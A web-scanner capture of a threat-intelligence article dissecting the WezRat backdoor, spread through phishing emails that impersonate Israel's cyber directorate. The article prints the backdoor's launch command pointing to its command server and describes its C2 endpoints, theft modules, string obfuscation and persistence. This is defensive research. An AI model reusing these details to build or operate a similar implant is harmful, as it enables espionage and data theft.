research.checkpoint.com
Open in
urlscan Pro
141.193.213.21
Public Scan
URL:
https://research.checkpoint.com/2024/wezrat-malware-deep-dive/
Submission: On November 18 via api from IN — Scanned from GB
Submission: On November 18 via api from IN — Scanned from GB
Form analysis 1 forms found in the DOM
POST /2024/wezrat-malware-deep-dive/#wpcf7-f26727-o1
<form action="/2024/wezrat-malware-deep-dive/#wpcf7-f26727-o1" method="post" class="wpcf7-form demo resetting" aria-label="Contact form" novalidate="novalidate" data-status="resetting">
<div style="display: none;">
<input type="hidden" name="_wpcf7" value="26727">
<input type="hidden" name="_wpcf7_version" value="6.0">
<input type="hidden" name="_wpcf7_locale" value="en_US">
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f26727-o1">
<input type="hidden" name="_wpcf7_container_post" value="0">
<input type="hidden" name="_wpcf7_posted_data_hash" value="">
</div>
<div class="contact-form-outer">
<div class="flex-row">
<div class="flex-12">
<div class="col-margin">
<p><label>First Name<span class="wpcf7-form-control-wrap" data-name="your-first-name"><input size="40" maxlength="400" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required form-control" aria-required="true" aria-invalid="false"
value="" type="text" name="your-first-name"></span></label>
</p>
</div>
</div>
<div class="flex-12">
<div class="col-margin">
<p><label>Last Name<span class="wpcf7-form-control-wrap" data-name="your-last-name"><input size="40" maxlength="400" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required form-control" aria-required="true" aria-invalid="false"
value="" type="text" name="your-last-name"></span></label>
</p>
</div>
</div>
<div class="flex-12">
<div class="col-margin">
<p><label>Country<span class="wpcf7-form-control-wrap" data-name="country"><select class="wpcf7-form-control wpcf7-select classform-control" aria-invalid="false" name="country">
<option value="">—Please choose an option—</option>
<option value="China">China</option>
<option value="India">India</option>
<option value="United States">United States</option>
<option value="Indonesia">Indonesia</option>
<option value="Brazil">Brazil</option>
<option value="Pakistan">Pakistan</option>
<option value="Nigeria">Nigeria</option>
<option value="Bangladesh">Bangladesh</option>
<option value="Russia">Russia</option>
<option value="Japan">Japan</option>
<option value="Mexico">Mexico</option>
<option value="Philippines">Philippines</option>
<option value="Vietnam">Vietnam</option>
<option value="Ethiopia">Ethiopia</option>
<option value="Egypt">Egypt</option>
<option value="Germany">Germany</option>
<option value="Iran">Iran</option>
<option value="Turkey">Turkey</option>
<option value="Democratic Republic of the Congo">Democratic Republic of the Congo</option>
<option value="Thailand">Thailand</option>
<option value="France">France</option>
<option value="United Kingdom">United Kingdom</option>
<option value="Italy">Italy</option>
<option value="Burma">Burma</option>
<option value="South Africa">South Africa</option>
<option value="South Korea">South Korea</option>
<option value="Colombia">Colombia</option>
<option value="Spain">Spain</option>
<option value="Ukraine">Ukraine</option>
<option value="Tanzania">Tanzania</option>
<option value="Kenya">Kenya</option>
<option value="Argentina">Argentina</option>
<option value="Algeria">Algeria</option>
<option value="Poland">Poland</option>
<option value="Sudan">Sudan</option>
<option value="Uganda">Uganda</option>
<option value="Canada">Canada</option>
<option value="Iraq">Iraq</option>
<option value="Morocco">Morocco</option>
<option value="Peru">Peru</option>
<option value="Uzbekistan">Uzbekistan</option>
<option value="Saudi Arabia">Saudi Arabia</option>
<option value="Malaysia">Malaysia</option>
<option value="Venezuela">Venezuela</option>
<option value="Nepal">Nepal</option>
<option value="Afghanistan">Afghanistan</option>
<option value="Yemen">Yemen</option>
<option value="North Korea">North Korea</option>
<option value="Ghana">Ghana</option>
<option value="Mozambique">Mozambique</option>
<option value="Taiwan">Taiwan</option>
<option value="Australia">Australia</option>
<option value="Ivory Coast">Ivory Coast</option>
<option value="Syria">Syria</option>
<option value="Madagascar">Madagascar</option>
<option value="Angola">Angola</option>
<option value="Cameroon">Cameroon</option>
<option value="Sri Lanka">Sri Lanka</option>
<option value="Romania">Romania</option>
<option value="Burkina Faso">Burkina Faso</option>
<option value="Niger">Niger</option>
<option value="Kazakhstan">Kazakhstan</option>
<option value="Netherlands">Netherlands</option>
<option value="Chile">Chile</option>
<option value="Malawi">Malawi</option>
<option value="Ecuador">Ecuador</option>
<option value="Guatemala">Guatemala</option>
<option value="Mali">Mali</option>
<option value="Cambodia">Cambodia</option>
<option value="Senegal">Senegal</option>
<option value="Zambia">Zambia</option>
<option value="Zimbabwe">Zimbabwe</option>
<option value="Chad">Chad</option>
<option value="South Sudan">South Sudan</option>
<option value="Belgium">Belgium</option>
<option value="Cuba">Cuba</option>
<option value="Tunisia">Tunisia</option>
<option value="Guinea">Guinea</option>
<option value="Greece">Greece</option>
<option value="Portugal">Portugal</option>
<option value="Rwanda">Rwanda</option>
<option value="Czech Republic">Czech Republic</option>
<option value="Somalia">Somalia</option>
<option value="Haiti">Haiti</option>
<option value="Benin">Benin</option>
<option value="Burundi">Burundi</option>
<option value="Bolivia">Bolivia</option>
<option value="Hungary">Hungary</option>
<option value="Sweden">Sweden</option>
<option value="Belarus">Belarus</option>
<option value="Dominican Republic">Dominican Republic</option>
<option value="Azerbaijan">Azerbaijan</option>
<option value="Honduras">Honduras</option>
<option value="Austria">Austria</option>
<option value="United Arab Emirates">United Arab Emirates</option>
<option value="Israel">Israel</option>
<option value="Switzerland">Switzerland</option>
<option value="Tajikistan">Tajikistan</option>
<option value="Bulgaria">Bulgaria</option>
<option value="Hong Kong (China)">Hong Kong (China)</option>
<option value="Serbia">Serbia</option>
<option value="Papua New Guinea">Papua New Guinea</option>
<option value="Paraguay">Paraguay</option>
<option value="Laos">Laos</option>
<option value="Jordan">Jordan</option>
<option value="El Salvador">El Salvador</option>
<option value="Eritrea">Eritrea</option>
<option value="Libya">Libya</option>
<option value="Togo">Togo</option>
<option value="Sierra Leone">Sierra Leone</option>
<option value="Nicaragua">Nicaragua</option>
<option value="Kyrgyzstan">Kyrgyzstan</option>
<option value="Denmark">Denmark</option>
<option value="Finland">Finland</option>
<option value="Slovakia">Slovakia</option>
<option value="Singapore">Singapore</option>
<option value="Turkmenistan">Turkmenistan</option>
<option value="Norway">Norway</option>
<option value="Lebanon">Lebanon</option>
<option value="Costa Rica">Costa Rica</option>
<option value="Central African Republic">Central African Republic</option>
<option value="Ireland">Ireland</option>
<option value="Georgia">Georgia</option>
<option value="New Zealand">New Zealand</option>
<option value="Republic of the Congo">Republic of the Congo</option>
<option value="Palestine">Palestine</option>
<option value="Liberia">Liberia</option>
<option value="Croatia">Croatia</option>
<option value="Oman">Oman</option>
<option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="Puerto Rico">Puerto Rico</option>
<option value="Kuwait">Kuwait</option>
<option value="Moldov">Moldov</option>
<option value="Mauritania">Mauritania</option>
<option value="Panama">Panama</option>
<option value="Uruguay">Uruguay</option>
<option value="Armenia">Armenia</option>
<option value="Lithuania">Lithuania</option>
<option value="Albania">Albania</option>
<option value="Mongolia">Mongolia</option>
<option value="Jamaica">Jamaica</option>
<option value="Namibia">Namibia</option>
<option value="Lesotho">Lesotho</option>
<option value="Qatar">Qatar</option>
<option value="Macedonia">Macedonia</option>
<option value="Slovenia">Slovenia</option>
<option value="Botswana">Botswana</option>
<option value="Latvia">Latvia</option>
<option value="Gambia">Gambia</option>
<option value="Kosovo">Kosovo</option>
<option value="Guinea-Bissau">Guinea-Bissau</option>
<option value="Gabon">Gabon</option>
<option value="Equatorial Guinea">Equatorial Guinea</option>
<option value="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="Estonia">Estonia</option>
<option value="Mauritius">Mauritius</option>
<option value="Swaziland">Swaziland</option>
<option value="Bahrain">Bahrain</option>
<option value="Timor-Leste">Timor-Leste</option>
<option value="Djibouti">Djibouti</option>
<option value="Cyprus">Cyprus</option>
<option value="Fiji">Fiji</option>
<option value="Reunion (France)">Reunion (France)</option>
<option value="Guyana">Guyana</option>
<option value="Comoros">Comoros</option>
<option value="Bhutan">Bhutan</option>
<option value="Montenegro">Montenegro</option>
<option value="Macau (China)">Macau (China)</option>
<option value="Solomon Islands">Solomon Islands</option>
<option value="Western Sahara">Western Sahara</option>
<option value="Luxembourg">Luxembourg</option>
<option value="Suriname">Suriname</option>
<option value="Cape Verde">Cape Verde</option>
<option value="Malta">Malta</option>
<option value="Guadeloupe (France)">Guadeloupe (France)</option>
<option value="Martinique (France)">Martinique (France)</option>
<option value="Brunei">Brunei</option>
<option value="Bahamas">Bahamas</option>
<option value="Iceland">Iceland</option>
<option value="Maldives">Maldives</option>
<option value="Belize">Belize</option>
<option value="Barbados">Barbados</option>
<option value="French Polynesia (France)">French Polynesia (France)</option>
<option value="Vanuatu">Vanuatu</option>
<option value="New Caledonia (France)">New Caledonia (France)</option>
<option value="French Guiana (France)">French Guiana (France)</option>
<option value="Mayotte (France)">Mayotte (France)</option>
<option value="Samoa">Samoa</option>
<option value="Sao Tom and Principe">Sao Tom and Principe</option>
<option value="Saint Lucia">Saint Lucia</option>
<option value="Guam (USA)">Guam (USA)</option>
<option value="Curacao (Netherlands)">Curacao (Netherlands)</option>
<option value="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="Kiribati">Kiribati</option>
<option value="United States Virgin Islands (USA)">United States Virgin Islands (USA)</option>
<option value="Grenada">Grenada</option>
<option value="Tonga">Tonga</option>
<option value="Aruba (Netherlands)">Aruba (Netherlands)</option>
<option value="Federated States of Micronesia">Federated States of Micronesia</option>
<option value="Jersey (UK)">Jersey (UK)</option>
<option value="Seychelles">Seychelles</option>
<option value="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="Isle of Man (UK)">Isle of Man (UK)</option>
<option value="Andorra">Andorra</option>
<option value="Dominica">Dominica</option>
<option value="Bermuda (UK)">Bermuda (UK)</option>
<option value="Guernsey (UK)">Guernsey (UK)</option>
<option value="Greenland (Denmark)">Greenland (Denmark)</option>
<option value="Marshall Islands">Marshall Islands</option>
<option value="American Samoa (USA)">American Samoa (USA)</option>
<option value="Cayman Islands (UK)">Cayman Islands (UK)</option>
<option value="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="Northern Mariana Islands (USA)">Northern Mariana Islands (USA)</option>
<option value="Faroe Islands (Denmark)">Faroe Islands (Denmark)</option>
<option value="Sint Maarten (Netherlands)">Sint Maarten (Netherlands)</option>
<option value="Saint Martin (France)">Saint Martin (France)</option>
<option value="Liechtenstein">Liechtenstein</option>
<option value="Monaco">Monaco</option>
<option value="San Marino">San Marino</option>
<option value="Turks and Caicos Islands (UK)">Turks and Caicos Islands (UK)</option>
<option value="Gibraltar (UK)">Gibraltar (UK)</option>
<option value="British Virgin Islands (UK)">British Virgin Islands (UK)</option>
<option value="Aland Islands (Finland)">Aland Islands (Finland)</option>
<option value="Caribbean Netherlands (Netherlands)">Caribbean Netherlands (Netherlands)</option>
<option value="Palau">Palau</option>
<option value="Cook Islands (NZ)">Cook Islands (NZ)</option>
<option value="Anguilla (UK)">Anguilla (UK)</option>
<option value="Wallis and Futuna (France)">Wallis and Futuna (France)</option>
<option value="Tuvalu">Tuvalu</option>
<option value="Nauru">Nauru</option>
<option value="Saint Barthelemy (France)">Saint Barthelemy (France)</option>
<option value="Saint Pierre and Miquelon (France)">Saint Pierre and Miquelon (France)</option>
<option value="Montserrat (UK)">Montserrat (UK)</option>
<option value="Saint Helena, Ascension and Tristan da Cunha (UK)">Saint Helena, Ascension and Tristan da Cunha (UK)</option>
<option value="Svalbard and Jan Mayen (Norway)">Svalbard and Jan Mayen (Norway)</option>
<option value="Falkland Islands (UK)">Falkland Islands (UK)</option>
<option value="Norfolk Island (Australia)">Norfolk Island (Australia)</option>
<option value="Christmas Island (Australia)">Christmas Island (Australia)</option>
<option value="Niue (NZ)">Niue (NZ)</option>
<option value="Tokelau (NZ)">Tokelau (NZ)</option>
<option value="Vatican City">Vatican City</option>
<option value="Cocos (Keeling) Islands (Australia)">Cocos (Keeling) Islands (Australia)</option>
<option value="Pitcairn Islands (UK)">Pitcairn Islands (UK)</option>
</select></span></label>
</p>
</div>
</div>
<div class="flex-12">
<div class="col-margin">
<p><label>Email<span class="wpcf7-form-control-wrap" data-name="your-email"><input size="40" maxlength="400" class="wpcf7-form-control wpcf7-email wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-email form-control"
aria-required="true" aria-invalid="false" value="" type="email" name="your-email"></span></label>
</p>
</div>
</div>
<div class="flex-12">
<div class="col-margin">
<div class="button-wrap center relative">
<p><input class="wpcf7-form-control wpcf7-submit has-spinner button font-white" type="submit" value="SUBMIT"><span class="wpcf7-spinner"></span>
</p>
</div>
</div>
</div>
</div>
</div>
<div class="wpcf7-response-output" aria-hidden="true"></div>
</form>Text Content
* CONTACT US
* DISCLOSURE POLICY
* CHECKPOINT.COM
* UNDER ATTACK?
* Latest Publications
* CPR Podcast Channel
* Web 3.0 Security
* Intelligence Reports
* Resources
* ThreatCloud AI
* Threat Intelligence & Research
* Zero Day Protection
* Sandblast File Analysis
* About Us
* SUBSCRIBE
SUBSCRIBE
CATEGORIES
* Android Malware 23
* Artificial Intelligence 4
* ChatGPT 3
* Check Point Research Publications 392
* Cloud Security 1
* CPRadio 44
* Crypto 2
* Data & Threat Intelligence 1
* Data Analysis 0
* Demos 22
* Global Cyber Attack Reports 329
* How To Guides 12
* Ransomware 1
* Russo-Ukrainian War 1
* Security Report 1
* Threat and data analysis 0
* Threat Research 172
* Web 3.0 Security 9
* Wipers 0
MALWARE SPOTLIGHT: A DEEP-DIVE ANALYSIS OF WEZRAT
November 14, 2024
https://research.checkpoint.com/2024/wezrat-malware-deep-dive/
KEY FINDINGS:
* Check Point Research (CPR) provides a comprehensive analysis of a custom
modular infostealer, tracked as WezRat, after the FBI, the US Department of
Treasury, and the Israeli National Cybersecurity Directorate (INCD) released
a joint Cybersecurity Advisory and attributed the malware to the Iranian
cyber group Emennet Pasargad. The group has been held responsible for several
recent cyber operations in the US, France, Sweden, and Israel.
* The latest version of WezRat was recently distributed to multiple Israeli
organizations in a wave of emails impersonating the Israeli National Cyber
Directorate (INCD). WezRat can execute commands, take screenshots, upload
files, perform keylogging, and steal clipboard content and cookie files. Some
functions are performed by separate modules retrieved from the command and
control (C&C) server in the form of DLL files, making the backdoor’s main
component less suspicious.
* Analysis of the malware versions led to the discovery of partial source code
for the backend of WezRat. Further investigation of WezRat and its backend
suggests that different individuals may be responsible for its development
and operation.
* The malware has been active for over a year; it has not yet been publicly
analyzed or attributed to any group. During this time, WezRat gained
additional modules, and its backend infrastructure has undergone various
changes.
INTRODUCTION
On October 30th, the FBI, the US Department of Treasury, and the Israeli
National Cybersecurity Directorate (INCD) released a joint Cybersecurity
Advisory regarding recent activities of the Iranian cyber group Emennet
Pasargad. The group recently operated under the name Aria Sepehr Ayandehsazan
(ASA) and is affiliated with the Iranian Islamic Revolutionary Guard Corps
(IRGC). The advisory details operations that have impacted various countries,
including the US, France, Israel, and Sweden.
The following is a timeline of these activities:
* In mid-2023, the group, operating under the Anzu Team persona, hacked
a Swedish SMS service and distributed messages calling for the revenge of
those responsible for the Quran burnings that took place throughout the year.
* In December 2023, the group operating as For-Humanity, gained unauthorized
access to a U.S.-based IPTV streaming company to broadcast tailored messages
regarding the Israel-HAMAS conflict.
* In mid-2024, the group launched a cyber-enabled disinformation campaign
during the Summer Olympics. They hacked a French display provider to show
images denouncing the participation of Israeli athletes. Additionally, they
sent threats to Israeli athletes under the banner of the fake far-right
group Regiment GUD, impersonating the actual French group GUD.
* Throughout 2023 and 2024, the group carried out multiple influence operations
in Israel using various cover personas, including Cyber Flood, Contact-HSTG,
and Cyber Court.
The advisory also attributed a few malware hashes to the group. Check Point
Research tracks this malware family as WezRat. Recently, we identified the
latest version of WezRat being distributed in a large-scale phishing campaign
that impersonates the INCD and targets Israeli organizations.
This publication provides a technical analysis of the campaign and the malware.
WezRat was deployed for over a year, during which the malware’s architecture
evolved significantly, impacting both the client and server sides.
FAKE GOOGLE CHROME UPDATE CAMPAIGN
On October 21, 2024, multiple emails impersonating the Israeli National Cyber
Directorate (INCD) were sent to various Israeli organizations. These emails were
sent from the fraudulent address alert@il-cert[.]net and warned recipients of an
urgent necessity to update their Chrome browser.
Figure 1 – Phishing email sent to Israeli recipients.
The email included a link that appeared to direct users to the legitimate INCD
site, il-cert.org.il, but in fact, led to a lookalike domain, il-cert[.]net.
From there, victims would automatically download a file named Google Chrome
Installer.msi and then be redirected to the legitimate INCD website.
The downloaded MSI contains the legitimate Google Chrome installer and related
files, but it also drops a backdoor named Updater.exe and executes it with two
arguments:
"C:\Program Files (x86)\Google\Update\Updater.exe" connect.il-cert.net 8765
For persistence, the MSI also adds the Run registry key called Chrome Updater,
which executes the same command.
Figure 2 – Infection chain delivering WezRat.
The payload in this campaign, Updater.exe, is the latest version of the group’s
custom infostealer, WezRat.
WEZRAT ANALYSIS
WezRat is written in C++. We observed two samples of the backdoor recently used.
The primary difference between them is using OLLVM common obfuscation techniques
such as opaque predicates and control flow flattening. The obfuscated variant
also supports fewer commands. We provide an analysis of the latest
non-obfuscated version with full command support (md5:
6b0d7b2e422a93e81ceed3645d36dd40, internally called bd.exe).
Figure 3 – The difference between the two Updater.exe samples: OLLVM obfuscation
(on the left) vs its absence (on the right, sample with pdb
path C:\Users\PC\source\repos\bd\Release\bd.pdb).
The backdoor is executed with two parameters: connect.il-cert.net 8765, which
represents the C&C server, and a number used as a “password” to enable the
correct execution of the backdoor. After parsing the arguments, the backdoor
calculates an offset pointing to a function responsible for handling the C&C
connection and parsing the commands. It then subtracts the expected
number, 8765, from this offset and adds the argument provided as a “password.”
If an incorrect number is supplied, the offset will not align with the intended
function, causing the backdoor to execute an incorrect function or potentially
crash.
Figure 4 – Subtraction of the offset.
Once the C&C connection logic function is executed, the backdoor imports needed
DLLs, resolves imports used for enumeration of the system, networking, etc., and
creates a mutex named {FA531CC1-0497-11D3-A180-00105A276C3E}.
This mutex has been featured in code examples on various coding forums for
years, dating back to at least 2005. It has been utilized since earlier versions
of WezRat. Reusing unchanged forum code for basic tasks, such as limiting the
number of simultaneously running instances, could indicate a beginner developer,
particularly in the initial stages of the malware’s development.
COLLECTING INITIAL DATA FROM THE INFECTED MACHINE
The backdoor collects the following system information:
* User profile path via environment variables – used later for saving the
additional modules
* Local machine IP
* Computer name
* Username
The backdoor combines the IP, computer name, and username to calculate the bot
ID using the FNV-1a (Fowler–Noll—Vo) hashing algorithm. It employs the 64-bit
version of the algorithm but only utilizes the lower 32-bits. Then it combines
eight zeroes with the FNV hash, resulting in a format like 00000000da635cc5, and
stored it as md5. Although this value is not actually computed using the MD5
algorithm, earlier versions of WezRat (which will be discussed later) used the
MD5 hash algorithm for the calculation of the bot ID. This may be a strategy to
evade triggering certain defenses by omitting the more commonly recognized use
of MD5, instead opting for FNV.
Based on all the gathered information about the victim, the backdoor prepares
the following JSON:
Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
{"md5":"[bot ID]","computerName":"[Machine name]","userName":"[User
name]","ip":"[IP address]","os":"Windows"}
{"md5":"[bot ID]","computerName":"[Machine name]","userName":"[User
name]","ip":"[IP address]","os":"Windows"}
{"md5":"[bot ID]","computerName":"[Machine name]","userName":"[User name]","ip":"[IP address]","os":"Windows"}
NETWORK COMMUNICATION
Registering the bot with the C2 server
The initial network request to the C2 server contains the previously mentioned
JSON with user information and is sent to the API endpoint: /wez/Agent/InsMch.
This endpoint, “Insert Machine,” registers the machine with the C2 server. Upon
successfully processingthe new bot, the server responds with the
string true; however, the backdoor disregards this returned value from the
server.
Set up sleep intervals
Following registering the newly infected machine with the C2 server, the
backdoor subsequently sends a request to the /sleep/[MD5] API endpoint. The
response from the C2 server is then multiplied by 1000 and used as the number of
seconds the backdoor sleeps between requests to the C2 server (60 seconds in
cases we observed).
Command retrieval loop
To retrieve commands from the C2 server, the malware sends a request to
the /Read/[MD5] API endpoint using the POST method with the data q=[MD5]. The
server can respond with an encrypted string representing the command:
[Encrypted command name]>[Command value]<[Request ID].
For example, 101094087087098>60<26 which represents ohaal>60<26.
The following JSON represents responses sent back (unencrypted) to the C2
server:
Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
{ "id":[Request ID],"md5" : "[MD5]","response" : "[Response based on the
command]"}
{ "id":[Request ID],"md5" : "[MD5]","response" : "[Response based on the
command]"}
{ "id":[Request ID],"md5" : "[MD5]","response" : "[Response based on the command]"}
WezRat supports the following commands:
* ohaal updates the sleep timer. The backdoor checks the received value, and if
it is different than the current sleep time, it sends back a response to the
C2 server API endpoint /wez/Agent/UpSl, indicating the sleep timer has been
updated. This command is also used as a keepalive / do nothing command. The
backdoor does nothing when the timer doesn’t require changing.
* changedomain adds another C2 for the backdoor to communicate with in case the
original one goes down. Despite the name, this won’t overwrite the current
domain; it will only be added to the list and queried if requests to the
previous C2 fail. The backdoor responds with an API request to
the /wez/Agent/UpChd endpoint.
* command executes a command and sends the command response to
the /wez/Agent/UpCmd API endpoint. If the command sent by C2 is incorrect,
the backdoor will respond with a string reminding the malware operators of
the expected format: cmd.exe /c <your command>. The operators can also send
the mydir command (instead of a cmd command), which causes the backdoor to
download and save the mvpis.dll from the server. Then, the backdoor loads the
dll> into the program, resolves the GetContent export, calls it, and returns
the response to the server.
* upload downloads and saves JumpViewUi.dll from the server, loads it into the
program, resolves the up export, and calls it using the following parameters:
C2 address, arguments from the upload command, upFile/ endpoint to send the
reply to, and the request ID.
* screenshot downloads and saves STITP.dll from the server, loads it into the
program, and resolves the scj export. The resulting screenshot is saved to
the Pictures/Screenshots folder under the current user and then uploaded to
the server using the JumpViewUi.dll.
* EKeyLogger downloads and saves TaskFlowUi.dll from the server, loads it into
the program, resolves the threadKL export, and begins a new thread running
the threadKL function. While the keylogger thread is running, any other
command except for EKeyLogger received from the C2 server will cause
termination of the keylogger thread. Keystrokes are saved to
the AppData\Local\Temp\10105060.txt file, and once the thread is terminated,
the file is sent to the /kylog/ API endpoint on the C2 server.
* dwnfile downloads a file from the C2 server: the file name is appended to the
C2 URL, and the file is downloaded and saved to
the appdata/local/temp folder.
* dwnclipboard downloads and saves clp.dll from the server, loads it into the
program, and resolves two exports, GetClipboardText and FreeClipboardText.
These two functions retrieve the clipboard data, which is then freed and sent
to the C2 server.
* Sndcoockie (note that the misspelling was made by threat actors) downloads
and saves the JumpViewUi.dll from the server, loads it into the program, and
resolves the up export. It grabs SQLite cookie files from major
Chromium-based browsers and uploads them to the server using the resolved
export.
The DLL modules mentioned above are analyzed in the following section.
After executing each command received from the C2, the backdoor calls
the /wez/Agent/InsMch API endpoint again as a means of keep-alive. It then
receives another command from the /Read/ API endpoint and continues
indefinitely. All network requests to the C2 server use the firefox user agent.
STRING AND COMMAND ENCRYPTION
The backdoor uses a simple string encryption. Each character in the string is
converted to its ASCII decimal value, reduced by 10, and then formatted to a
three-digit number by adding a leading zero if needed.
For example, the string encrypted representation of the
string USERPROFILE is 075073059072070072069060063066059.
The decryption process is simple: split the strings into three-digit segments,
add 10 to each, and then convert each part to a character.
We’ve noticed that some strings in the C2 commands, such as command, are
decremented by 14 instead of 10. It doesn’t affect the backdoor execution as it
compares received commands in encrypted form but instead suggests these are
artifacts left from older versions.
ERROR HANDLING / DEBUG STRINGS
The backdoor’s exception handlers include random phrases to modify the result
of GetLastError function, allowing it to return a string or parts of it. We
found no practical use for those modifications, as the errors are not reported
back to the server. They could simply be leftover debug information or a means
for operatives to identify errors while testing and using the backdoor, without
disclosing its malicious intent.
Figure 5 – Exception handlers using the error handling strings.
DLL MODULES
As detailed before, to execute specific C2 commands, additional DLLs must be
downloaded from the C2 server. These DLLs are stored in
the appdata/local/temp directory, loaded into the program, and then a specific
export is executed. In total, five DLLs are used in the WezRat sample deployed
in the campaign impersonating INCD. We could not obtain these modules from the
C2 server during our analysis, as it was only active for a brief period.
However, by tracking potential infrastructure used by threat actors, we
identified a new C2 server set up by the actor in early November, and we
successfully retrieved the modules.
While the URLs and functionality of these DLLs mostly aligned with our
expectations, the DLL and export names differed in some cases. The actors likely
not only improved the modules’ code over time but also varied the export names
to give each DLL unique characteristics. Additionally, some DLLs include
obfuscation and use the same string obfuscation techniques as the main backdoor.
Although we could not retrieve a payload from the Download/3 endpoint, which was
expected to provide the DLL handling the mydir command, the server did contain
an additional DLL at the Download/6 named persist.dll. This DLL handles
persistence but was not referenced in the sample we analyzed, as persistence was
managed by its MSI installer.
Below is a summary comparing the expected modules with those retrieved from the
actor-controlled server:
EndpointModule functionalityModule/ export name (from the sample)DLL/export name
(from another C2 server)OLLVM obfuscationString obfuscationCompilation timestamp
(UTC)Download/0Take screenshotSPITP.dll (scj)scDll.dll (scsh)Oct 21, 2024,
12:26:16Download/1KeyloggerTaskFlowUi.dll (threadKL)klDll.dll (threadKL)VVOct
27, 2024, 07:39:14Download/2Upload file to the serverJumpViewUi.dll
(up)upDll.dll (up)VVOct 27, 2024, 07:41:59Download/3Perform mydir
commandmvpis.dll (GetContent)––––Download/4Get clipboard dataclp.dll
(GetClipboardText, FreeClipboardText)clbDll.dll (GetClipboardText,
FreeClipboardText)Oct 16, 2024, 06:18:18Download/6Set up persistence–persist.dll
(MainFunc)Nov 04, 2024, 07:43:51
SCREENSHOT MODULE – SCDLL.DLL
The arguments in this DLL are slightly different than what we expected from the
WezRat code. In this version, the DLL accepts two arguments: result and target
directory. When the DLL is loaded, and the export scsh is called, it resolves
APIs commonly used for taking screenshots:
Figure 6 – Windows API used in screenshot capture module.
The result BMP image name is generated using random numbers:
Figure 7 – Generation of the image name using calls to random and some
manipulations on generated numbers.
The module combines the target directory provided as an argument with the
generated bmp name, saves the screenshot to the resulted path, copies the result
image path to the first argument, and returns it to the main backdoor.
KEYLOGGER – KLDLL.DLL
The keylogger DLL starts from the threadKL export and utilizes the Windows APIs
that are commonly used to capture keystrokes, such as SetWindowsHookExA,
CallNextHookEx, GetKeyState, and GetAsyncKeyState.
Then, it starts a thread that goes over the results of the key state functions
and writes them to a file AppData\Local\Temp\10105060.txt.
Figure 8 – Part of the keylogger code.
FILE UPLOAD – UPDLL.DLL
The primary purpose of the DLL is to upload files to the C2 server. It is called
by the up export, with four arguments: the C2 server address, the path on C2
server, the path to the file to exfiltrate, and the upload name.
The file is sent to the C2 server in a POST request using User-Agent edge:
GET CLIPBOARD DATA – CLBDLL.DLL
This module also uses common Windows APIs to get clipboard data:
Figure 9 – Windows API used by the clipboard module.
GetClipboardText export resolves the aforementioned DLLs and exports. It then
calls OpenClipboard to open the clipboard and gain access to its contents, uses
GetClipboardData to retrieve a handle to the data, uses this handle (with
GlobalLock to lock the data into memory) to read the clipboard contents into the
buffer, and returns them to the caller. FreeClipboardText export is then used to
free a buffer received as an argument.
PERSISTENCE MODULE – PERSIST.DLL
The sole purpose of this DLL is to establish persistence by adding a registry
key under Software\Microsoft\Windows\CurrentVersion\Run.
The DLL has a single export named MainFunc which requires 2 arguments: the path
to the program to run and arguments to run it with. The provided values are then
used as the values for a newly created registry key called Updater.
Threat actors likely use this DLL to enable WezRat persistence, particularly in
infection chains that haven’t yet established persistence, as WezRat itself
lacks built-in persistence mechanisms.
OLDER VERSIONS AND WEZRAT EVOLUTION
The earliest sample of WezRat we identified was compiled on August 30, 2023, and
uploaded to Virus Total on September 1, 2023. It was aptly named first.exe.
The earlier versions of WezRat had hardcoded C2 server addresses and didn’t rely
on “password” argument to run. String encryption uses the same algorithm in all
the versions.
Data collected on the infected machine by first.exe is similar and contains the
computer name, username, and local IPv4. In this version, the data is combined,
and the md5 field (bot ID) is calculated using actual MD5 and not FNV. In terms
of its API, it functions similarly to the latest version. A newly infected
machine is registered with the C2 using the /wez/insert endpoint. For command
execution, the system uses the /api/ endpoint to receive commands, the /api2/ to
retrieve data for command execution, and then again to send the results of the
executed command. Throughout the various samples, the available commands are:
Command NameCommand ActionsleepUpdate the sleep time between
requestscommandExecute a command and return the resultsdirrList a directory and
return the resultsdownloadUpload a file to the C2uploadingDownload a file from
the C2libraryReceive a DLL from the C2 server to directly load into
memoryexecuteExecute a processchangedomainAdd another C2 address to attempt to
communicate with
WEZRAT CAPABILITIES EVOLUTION
In addition to first.exe, we found more samples from various dates active
towards the end of 2023 to the beginning of 2024. Judging by the remaining
artifacts, they were used in different infection chains. For
example, afwpmz.exe and users.dll have close compilation dates, the same
functionality, and even the same C2 server. However, users.dll is compiled as
DLL (pdb path: E:\w2\Back - Copy (2)\x64\Release\Dll1.pdb), and afwpmz.exe seems
to run persistently from the Startup folder.
The commands shared among all samples include sleep/ohaal, command and
changedomain, and the presence of others varies depending on the sample and the
context in which they were used. The “password” for running the sample correctly
was first added in the One_Drive.exe sample, created at the end of January 2024.
Summary of the supported commands across various samples of WezRat, along with
their compilation dates:
Commandfirst.exe
(2023-08-30)afwpmz.exe
(2023-11-23)users.dll
(2023-11-25)One_Drive.exe
(2024-01-28)Updater.exe / bd.exe
(2024-10-15)Updater.exe with ollvm
(2024-10-17)sleepVVVVVVcommandVVVVVVdirrVVVVdownloadVVuploadingVVVlibraryVexecuteVchangedomainVVVVVVscreenshotVVkeyloggerVVdwnclipboardVsndcookieV
WezRat initially functioned more as a simple Remote Access Trojan with basic
commands. Over time, additional features such as screenshot capabilities and a
keylogger were incorporated and handled as separate commands. We believe that
these features rely on the code of DLLs already utilized by the threat actors,
possibly accessed through the library command.
SOCKET-BASED SAMPLES
In May 2024, another set of samples was uploaded to Virus Total. These samples
feature the same string obfuscation and similar error handling with random
phrases, but they are significantly different from WezRat. Those samples have
the pdb
path C:\Users\Administrator\Desktop\Socket-Client\Socket-Client\x64\Release\Socket-Client.pdb and
use raw socket communication instead of HTTP/S.
The samples lack features like mutex creation or user profiling, which are
present in WezRat, and have only one capability: command execution, acting like
a reverse shell. Socket-based samples require three arguments: C2 address, port,
and “password,” acting similarly to WezRat, with the primary logic function
having its correct offset relying on the correct password.
